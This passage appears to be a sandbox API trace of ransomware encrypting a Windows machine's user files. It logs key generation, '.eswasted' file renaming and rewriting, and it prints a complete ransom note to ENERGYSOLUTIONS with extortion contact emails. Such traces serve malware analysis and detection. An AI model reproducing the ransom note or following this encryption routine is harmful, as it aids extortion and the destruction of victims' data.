KEY:\r\n[begin_key]Bblqwd5LoFmGGXHsC660dFvdozHLMRY7NYoagTBlqA49bpyYHyQgvojG7o4q2To7\r\nedycVcm++kOhP4bjfZqNAlrvM/Y9MzrCg58VBSRn+V6NzeA3uOWqqrVMxUXYtAlX\r\nsS2lGkeKidvJsAaJl1OhaOJIo8pGeyfBlmWbqNYQW2w/tZxBH6GsIoBWTJniXoqo\r\n9LUxVts+RF0UYeTf6A8I3PvErdJ9JIveHwgFty/Hzxnqei9crJXmsy669dh8yUMf\r\nCUTruhkpvF6zK1FIM09LAVW/23eHmWJahMws3Ib0W0niGA92DCegFP/MK2kQzF/j\r\nevvpwh3Td04+Mx89EUGZuv5jweNsZSGPlknFdeMDD6IRlavDknpGAMFSg6INQATo\r\nXVgjmh9dLbyhw0kFnw26Nby70Jm/Vsd14LRuv+YMFSTbhnNzg3CZw93HtAnvWBal\r\nFFhc6vnqrDiZM8uBQVyopz7Tab4AkOjtF8gm3/fieJeZDZaSWZjHyCU7YnA1ASdO\r\nDZejrIYbqNzXI5p0qs5M4Rki/EJKP7xhfbRWDGaG2imi22JpCRchgUitwtvfZVZH\r\nzlkutm/ZWRmRhCTHx6ePO2GwqrPrReDJdc6vQBXrfoxyElpoYgdf5lyBkrmKDRmj\r\nsIWETtntz+nUSahQ5Z+ZGnNu0fRFP8VHHoi8mnBSTjJ=[end_key]\r\nKEEP IT\r\n") returned 990 [0082.828] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de3e8 | out: hHeap=0x4a0000) returned 1 [0082.829] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0082.829] SetEndOfFile (hFile=0x100) returned 1 [0082.831] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.831] CloseHandle (hObject=0x100) returned 1 [0082.893] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eacd8 | out: hHeap=0x4a0000) returned 1 [0082.894] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4fa9c8 | out: hHeap=0x4a0000) returned 1 [0082.894] _aulldvrm () returned 0x0 [0082.894] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0082.895] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0082.895] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.895] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact") returned 51 [0082.895] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x270) returned 0x4ddfd8 [0082.895] lstrcpyW (in: lpString1=0x4de03e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0082.895] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0082.895] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0082.895] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0082.896] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0082.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.eswasted_info" (normalized: "c:\\users\\default\\contacts\\administrator.contact.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0082.896] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0082.897] SetEndOfFile (hFile=0x100) returned 1 [0082.897] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.897] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0082.897] lstrcpyW (in: lpString1=0x4de03e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0082.897] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact" (normalized: "c:\\users\\default\\contacts\\administrator.contact"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.eswasted" (normalized: "c:\\users\\default\\contacts\\administrator.contact.eswasted")) returned 1 [0082.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Contacts\\Administrator.contact.eswasted" (normalized: "c:\\users\\default\\contacts\\administrator.contact.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0082.898] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0082.899] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x10b1e [0082.899] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b1e) returned 0xf90000 [0082.899] CloseHandle (hObject=0xfc) returned 1 [0083.032] UnmapViewOfFile (lpBaseAddress=0xf90000) returned 1 [0083.032] CloseHandle (hObject=0x110) returned 1 [0083.032] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4de458 [0083.032] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0083.033] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de4a0 | out: pbBuffer=0x4de4a0) returned 1 [0083.033] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.033] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0083.034] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0083.034] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.042] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4dd498 [0083.042] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de458 | out: hHeap=0x4a0000) returned 1 [0083.042] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0083.042] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Zy4LhxpD8lvvSNDlBPOKqFHGe8pHZ3HBJusFlBMqszNCOehtroe69nfGnb2XoGpf\r\nLomzlos4hq8YHSq50CgFmEbECjq6a17DNYXgrq0Qm8dlGZvbZJuZx95QM/VX2K0g\r\ntvtqd53AbKN3cRBrI4Gm6Y0F3IbmMuAV9WMqXZ8ejl9k+I9bjB2MW4gMzsNvaYIB\r\ndia87r2xLOUzmUycOQbWdfm/rhZKUzK6PN2+7rTeMFVEFAEATMGRin7BVxiqfjel\r\noghQbIKsQ6yi3lHAy+/XSkMq59b6Lvo5kuuvf7ITdo1Yo07EmMRDUinB9a2+ZUWr\r\n0K18vXJic4yR37aWCtiKb0l0hNFexBjBzlfcnTv/3FKzCKq8D2MXfuAQqL9vkAQt\r\n05y0HOxIlsN3WrL282N1sqMJbE4d6hzFou2pjtc9avd4K4Ls/5/rN+X2fQ8mcj+N\r\n8MxIjmOVt2S3/HiFXpqXnpuL8eMQPD4moM6XWmikjMa3SQtS4aFL3YlynkbUZaDk\r\nLc0ixPiV+Nrq1vsaDYpVAn6Nnq1orLia+eD6zTYH1vkXFEdp50v6q4MDEsOckEjW\r\nLmzZVrCS7MQFEPr8xdL68DRHsAERieTAwJkq5Xphiwbrb98bTVD060N9ywLU1cwR\r\nzaNCfNytd+2C3REa7PLEGIYbsvFeleZsV9OTQn//F1P=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.042] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.042] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0083.043] SetEndOfFile (hFile=0x100) returned 1 [0083.045] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0083.045] CloseHandle (hObject=0x100) returned 1 [0083.046] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0083.046] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x502308 | out: hHeap=0x4a0000) returned 1 [0083.046] _aulldvrm () returned 0x0 [0083.046] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0083.047] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0083.047] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.047] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 71 [0083.047] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x298) returned 0x4de458 [0083.047] lstrcpyW (in: lpString1=0x4de4e6, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.047] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.047] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0083.048] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0083.048] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0083.049] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0083.050] SetEndOfFile (hFile=0x100) returned 1 [0083.050] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.050] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.050] lstrcpyW (in: lpString1=0x4de4e6, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.050] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.eswasted")) returned 1 [0083.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0083.051] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0083.052] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x85 [0083.052] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0083.052] CloseHandle (hObject=0x110) returned 1 [0083.054] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0083.054] CloseHandle (hObject=0xfc) returned 1 [0083.054] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ddfd8 [0083.054] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0083.055] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de020 | out: pbBuffer=0x4de020) returned 1 [0083.055] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.055] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0083.055] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0083.055] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.064] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4dd498 [0083.064] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0083.064] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0083.064] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]O6FgQZ3fsLwKft2Jrb768x28Ow9NsBKkINI2coGPe9n8F2lhF8QVnvJAlndgaWT2\r\nj6ZprSTdcslS9m2Hv/CzaN067WBLFL8RnQnV3/H+q1hgqvu0a5mjjCMeEl7d0U0i\r\na4/8+cdO6/g/81zlpxrui/c6R9oytuiH4Z1W0I3270eFEQ069G17294xnZM4qAYN\r\nErWdIfyJbiYhfqLTMWp5ndmCoCbzRjELNm56aNlOo8eaCdECPHk7a7EKP6hPHtvr\r\nefbs8DaVcLEblxNLgDJS/2Rvp7PQTWDbvRH0LDVb4Zl6gVI8z5rxicvw4VJsRo0Q\r\nQGu3aKxVYMZK3UeMTwCZ4psMK6lYhAdOPwwBmlMlRXasec2GFoTI7KvOO0h59GD5\r\nJ/9U1PwyyYfBY3MGitcyNyUJBeIWVZo1trOqrTsFziiOFFFq9b2FbM7S0plSxBZg\r\nBgSLV+bnp6tMB4KDF0v6DA46c0bxrjNmvbVa44clh0UcApaeeWzOA32O74C4ICca\r\nKptcBa5JjfAcjtEjU+7cfmcxOrJaX4E/qG099Y96GMPA7OBJNB5FlzNUBgR0vX6D\r\nt70xAb9+srfFXGXPS0qaF4W4GUxhsaQYd7Zxy8akDzc44enmiWGsPF1SWb0sOha1\r\nPPnyUcO2lWFG6x2IrHDRzk4qwBZKB8+dcGW6cx35Pb3=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.064] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.064] WriteFile (in: hFile=0x100, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0083.064] SetEndOfFile (hFile=0x100) returned 1 [0083.082] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0083.082] CloseHandle (hObject=0x100) returned 1 [0083.084] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de458 | out: hHeap=0x4a0000) returned 1 [0083.084] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x500770 | out: hHeap=0x4a0000) returned 1 [0083.084] _aulldvrm () returned 0x0 [0083.084] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0083.085] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0083.085] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.085] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url") returned 57 [0083.085] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27c) returned 0x4d91a8 [0083.085] lstrcpyW (in: lpString1=0x4d921a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.085] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.085] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0083.086] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0083.086] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.086] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0083.087] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0083.088] SetEndOfFile (hFile=0x100) returned 1 [0083.088] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.088] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.088] lstrcpyW (in: lpString1=0x4d921a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.eswasted")) returned 1 [0083.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0083.089] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0083.089] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x85 [0083.089] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0083.090] CloseHandle (hObject=0xfc) returned 1 [0083.091] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0083.092] CloseHandle (hObject=0x110) returned 1 [0083.092] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ddfd8 [0083.092] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0083.092] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de020 | out: pbBuffer=0x4de020) returned 1 [0083.092] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.093] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0083.093] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0083.093] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.101] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de1e0 [0083.102] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0083.102] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.102] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]NzkV+LGcJ2058R+ec8JcskCnkd3GKx+bjeWwPaA/HEDYsJt8P7MESgmEe7LCrxD+\r\ndFMRt5eopX1kF/bljgzVgNEnIoYI+uk/iy7a7W5D2u09vkDXAx4IdCHPlT6rnDaR\r\nm6Qtxuj1A9ohPUUqsoObNNypKZpat3IOLf9AJ1igCPorAAaiZXjm+dyh3Le0puZ9\r\nAo7J9Kbzw3TcJyux/PJI9nS/iCWvc62Tz4eypdrbOvidCiWOGu4CFO4b9CfpaJ9D\r\nIi9aQXtvtjK5Fv35VYDGT5f6Rgd99U92qmaJfba3JnJDVXinY64EsRlKblW0R9vx\r\nZP0Nx1G0aAiOYl7XnWzFC1zIrZyPs/ZgWZWLH3oktKMg+i1tsr70z3WLp6YZGp1z\r\n7tbtdYddwHTd5XC1zuZdYoY/aHtU1wlwx4O8ea+vz96kKhJS8zzaNd7+lGFu+JY4\r\nD5geTzOPWhOvadw+Aw6XSEmnfXuWLQKjDp6D7/5/3yAYeDtxk6obotxUCEYAGK1o\r\nl2UMsLZ3ELZf4kbTjIj1B+uv7mJt2QtU5JpdZ9GE+1X7zxyePEcZoJuj0PkSwhKj\r\nZH2shC+OQAJEmyVcTiROmQkhptoXJ9PPMfzHC4XJpPycqJBGj9H2LjJakfyBQSbv\r\nsGcA29r4peKGovCAANmqGHTb8Ojwsul5Rkb808qCLXC=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.102] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de1e0 | out: hHeap=0x4a0000) returned 1 [0083.102] WriteFile (in: hFile=0x100, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0083.102] SetEndOfFile (hFile=0x100) returned 1 [0083.106] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.106] CloseHandle (hObject=0x100) returned 1 [0083.108] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0083.108] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f49d8 | out: hHeap=0x4a0000) returned 1 [0083.108] _aulldvrm () returned 0x0 [0083.108] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0083.109] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0083.109] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.109] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 65 [0083.109] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x28c) returned 0x4d91a8 [0083.109] lstrcpyW (in: lpString1=0x4d922a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") 